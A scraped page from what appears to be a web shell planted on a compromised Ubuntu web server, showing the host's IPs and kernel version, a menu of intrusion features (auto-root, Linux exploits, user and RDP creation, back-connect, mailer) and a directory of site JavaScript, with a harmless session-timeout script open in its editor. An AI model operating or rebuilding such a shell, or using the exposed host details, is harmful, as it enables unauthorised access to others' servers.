Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.7.18
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
orms-gug /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
Chart.Core.js
70.32
KB
-rwxr-xr-x
Chart.Doughnut.js
6.2
KB
-rwxr-xr-x
Chart.js
115.34
KB
-rwxr-xr-x
control.js
18.44
KB
-rwxr-xr-x
dytable.js
30.95
KB
-rwxr-xr-x
dytable_old.js
28.96
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
functions.js
391
B
-rwxr-xr-x
home.js
135.37
KB
-rwxr-xr-x
home11.js
131.88
KB
-rwxr-xr-x
home_arun.js
26.93
KB
-rwxr-xr-x
home_old.js
27.29
KB
-rwxr-xr-x
home_sand.js
20.19
KB
-rwxr-xr-x
homecopy.js
21.8
KB
-rwxr-xr-x
index.js
7.23
KB
-rwxr-xr-x
index_06092017.js
4.51
KB
-rwxr-xr-x
index_11102017.js
7.18
KB
-rwxr-xr-x
index_old.js
3.91
KB
-rwxr-xr-x
jquery-1.7.2.min.js
92.62
KB
-rwxr-xr-x
jquery.flexslider-min.js
10.87
KB
-rwxr-xr-x
loadtable.js
58.93
KB
-rwxr-xr-x
loadtable_11.09.2018.js
57.04
KB
-rwxr-xr-x
loadtable_old.js
10.94
KB
-rwxr-xr-x
modernizr.custom.js
6.76
KB
-rwxr-xr-x
script.js
1.09
KB
-rwxr-xr-x
script_old.js
1.08
KB
-rwxr-xr-x
sessionexpired.js
2.24
KB
-rwxr-xr-x
upload.js
37.84
KB
-rwxr-xr-x
validate.js
10.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sessionexpired.js
//event to check session time variable declaration var checkSessionTimeEvent; //time session started var pageRequestTime; //session timeout length var timeoutLength = 1400*1000; //force redirect to log in page length (session timeout plus 10 seconds) var forceRedirectLength = timeoutLength + (10*1000); //set time for first warning, ten seconds before session expires var warningTime = timeoutLength - (10*1000); //set number of seconds to count down from for countdown ticker var countdownTime = 10; function checkSessionTime() { //get time now var timeNow = new Date(); //event create countdown ticker variable declaration var countdownTickerEvent; //difference between time now and time session started variable declartion var timeDifference = 0; timeDifference = timeNow - pageRequestTime; if (timeDifference > warningTime && timeDifference < timeoutLength) { //call now for initial dialog box text (time left until session timeout) countdownTicker(); //alert("timeout warning"); //set as interval event to countdown seconds to session timeout countdownTickerEvent = setInterval("countdownTicker()", 1000); $('#dialogWarning').dialog('open'); } else if (timeDifference > timeoutLength){ //close warning dialog box if ($('#dialogWarning').dialog('isOpen')) $('#dialogWarning').dialog('close'); //$("p#dialogText-expired").html(timeDifference); $('#dialogExpired').dialog('open'); //clear (stop) countdown ticker clearInterval(countdownTickerEvent); } if (timeDifference > forceRedirectLength) { //clear (stop) checksession event clearInterval(checkSessionTimeEvent); //alert("time to quit"); //force relocation window.location="http://"+window.location.host+"/"+window.location.pathname.split('/')[1]; } } function countdownTicker() { //put countdown time left in dialog box $("span#dialogText-warning").html(countdownTime); //decrement countdownTime countdownTime--; } function ResetTimer() { //alert("loading"); pageRequestTime = new Date(); }
Close